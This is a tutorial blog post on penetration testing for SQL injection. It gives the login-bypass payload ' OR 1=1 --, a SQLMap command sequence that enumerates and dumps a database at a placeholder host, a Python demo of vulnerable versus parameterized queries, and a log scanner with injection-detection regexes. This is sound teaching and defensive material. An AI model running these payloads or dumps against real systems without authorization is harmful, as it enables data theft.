DEV Community

3a5abi 🥷

Posted on • Edited on • Originally published at devtoys.io

🖋️ Pen Testing SQL Injections

In today’s digital age, SQL injections remain a prevalent threat to database security. As businesses increasingly rely on data-driven applications, understanding how to protect against SQL injections is crucial. This article will guide you through the fundamentals of SQL injection pen testing, complete with practical examples to help bolster your cybersecurity measures.


What is SQL Injection?

SQL injection is a code injection technique that exploits vulnerabilities in an application’s software by inserting or “injecting” malicious SQL code. This code can manipulate the database, allowing attackers to bypass authentication, retrieve, alter, or delete data.


Why Pen Test for SQL Injections?

Penetration testing (pen testing) for SQL injections is vital to identify and mitigate potential vulnerabilities before they can be exploited. This proactive approach helps safeguard sensitive information and ensures the integrity of your database.


Preparing for a Pen Test

Before starting a pen test, it’s essential to have:


  • Legal Authorization: Ensure you have explicit permission to test the target system.
  • Testing Environment: Use a staging environment identical to the production setup.
  • Tools: SQLMap and Burp Suite are the common choices, used alongside manual testing techniques.

Steps to Pen Test SQL Injections

1. Information Gathering

Start by understanding the application and identifying potential entry points. Common areas include:

  • Login forms
  • Search fields
  • URL parameters
  • User feedback forms

2. Identify Vulnerable Inputs

Use the following techniques to find vulnerable inputs:

  • Error-Based Injection: Inject single quotes (') to see if the application returns an SQL error.
  • Union-Based Injection: Use the UNION SQL operator to combine the results of two queries.
  • Boolean-Based Injection: Inject SQL code that returns different results based on a true or false condition.

Example:

For a login form with fields username and password, inject:

' OR 1=1 --

If the application logs you in without valid credentials, it’s likely vulnerable.
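The login bypass described above, reproduced as an added example that is not part of the original post: a throwaway in-memory SQLite database with a single constructed user, the string-concatenated query that makes the form injectable, and the parameterized query that closes the hole. The table layout, the user `alice`, and the function names are the example's own.

```python
import sqlite3

# Throwaway in-memory database with one constructed user record.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
# Plaintext password only to keep the demo short; a real system stores a salted hash.
DB.execute("INSERT INTO users (username, password) VALUES ('alice', 's3cret')")
DB.commit()


def login_vulnerable(username: str, password: str) -> bool:
    """The pattern that makes a login form injectable: user input is spliced
    straight into the SQL text, so a quote in the input ends the string literal
    and a trailing '--' comments out the password check."""
    sql = (
        f"SELECT id FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return DB.execute(sql).fetchone() is not None


def login_safe(username: str, password: str) -> bool:
    """Parameterized query: the driver passes the values separately from the SQL
    text, so a quote or comment marker in the input is just data to compare."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return DB.execute(sql, (username, password)).fetchone() is not None


def raises_db_error(username: str) -> bool:
    """Error-based signal from step 2: does a lone quote in the username make
    the concatenated query fail with a database error?"""
    try:
        login_vulnerable(username, "x")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    payload = "' OR 1=1 --"
    print("vulnerable, real credentials:   ", login_vulnerable("alice", "s3cret"))
    print("vulnerable, payload as username:", login_vulnerable(payload, "anything"))
    print("parameterized, payload as user: ", login_safe(payload, "anything"))
    print("lone quote raises a DB error:   ", raises_db_error("'"))
```

The vulnerable function returns True for the payload because the resulting SQL reads `... WHERE username = '' OR 1=1 --' AND password = 'anything'`, and everything after `--` is a comment. The parameterized version compares the literal string `' OR 1=1 --` against stored usernames and finds nothing, which is the fix to look for when you write up the finding.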


3. Exploiting SQL Injections

Once a vulnerability is confirmed, craft specific payloads to extract data. Here’s a step-by-step example using SQLMap:

Step 1: Identify the target URL with a vulnerable parameter.

http://example.com/login?username=admin&password=admin

Step 2: Run SQLMap against the URL.

sqlmap -u "http://example.com/login?username=admin&password=admin" --dbs

Step 3: List the tables in a database found in Step 2.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db --tables

Step 4: List the columns of a table found in Step 3.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db -T target_table --columns

Step 5: Dump the contents of a column found in Step 4.

sqlmap -u "http://example.com/login?username=admin&password=admin" -D target_db -T target_table -C target_column --dump
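From the defender's side, the probes in step 2 and a SQLMap run from step 3 leave recognisable traces in the web server's access log. The following is an added example, not part of the original post: a small scanner over constructed combined-format log lines (the IPs, paths and timestamps are made up) that flags decoded query strings matching the injection patterns described above, and requests whose User-Agent advertises sqlmap (its default User-Agent starts with `sqlmap/`). The function names and the reason labels are the example's own.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample log in combined format:
#   ip ident user [time] "method target proto" status size "referer" "user-agent"
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Mar/2024:12:00:01 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [10/Mar/2024:12:00:05 +0000] "GET /search?q=o%27brien HTTP/1.1" 200 498 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:12:01:10 +0000] "GET /login?username=%27+OR+1%3D1+--&password=x HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:12:01:12 +0000] "GET /item?id=1%27+UNION+SELECT+1,2,3-- HTTP/1.1" 500 233 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Mar/2024:12:02:00 +0000] "GET /item?id=1 HTTP/1.1" 200 900 "-" "sqlmap/1.8 (https://sqlmap.org)"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shapes of the error-, union- and boolean-based probes named in the article.
PAYLOAD_RE = re.compile(
    r"""(?ix)
    ['"]\s*(?:or|and)\b               # quote that closes a literal, then OR / AND
    | ['"]\s*(?:--|\#)                # quote followed by a comment marker
    | \bunion\s+(?:all\s+)?select\b   # UNION SELECT from a union-based probe
    | \b(?:or|and)\s+\d+\s*=\s*\d+    # OR 1=1 style tautology
    """
)
SCANNER_UA_RE = re.compile(r"sqlmap", re.IGNORECASE)


def parse_line(line: str):
    """Split one combined-format line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_query(target: str) -> str:
    """Return the URL-decoded query string, since payloads arrive percent-encoded."""
    return unquote_plus(urlsplit(target).query)


def classify(entry: dict) -> list:
    """Reasons this request looks like injection activity (empty list if none)."""
    reasons = []
    if PAYLOAD_RE.search(decoded_query(entry["target"])):
        reasons.append("sqli-payload")
        # A 5xx on a request carrying a payload is the server-side view of
        # an error-based probe and deserves a closer look.
        if entry["status"].startswith("5"):
            reasons.append("server-error-on-payload")
    if SCANNER_UA_RE.search(entry["ua"]):
        reasons.append("scanner-user-agent")
    return reasons


def scan_log(lines) -> list:
    """Return one finding per suspicious request, preserving log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = classify(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "target": entry["target"],
                             "status": entry["status"], "reasons": reasons})
    return findings


def count_by_ip(findings) -> dict:
    """Number of flagged requests per source address, for triage ordering."""
    return dict(Counter(f["ip"] for f in findings))


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(count_by_ip(scan_log(SAMPLE_LOG)))
```

The second sample line, a search for `o'brien`, is not flagged: a lone apostrophe in legitimate input is common, so the patterns require a quote followed by an operator or comment marker rather than any quote at all. Treat hits as triage signals, not proof, and pair them with the source address counts: three flagged requests from one address within a minute is the shape of a scan, one flagged request from a customer is often a typo.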

👀 To continue reading the full article visit ===> Pen Testing SQL Injections - DevToys.io
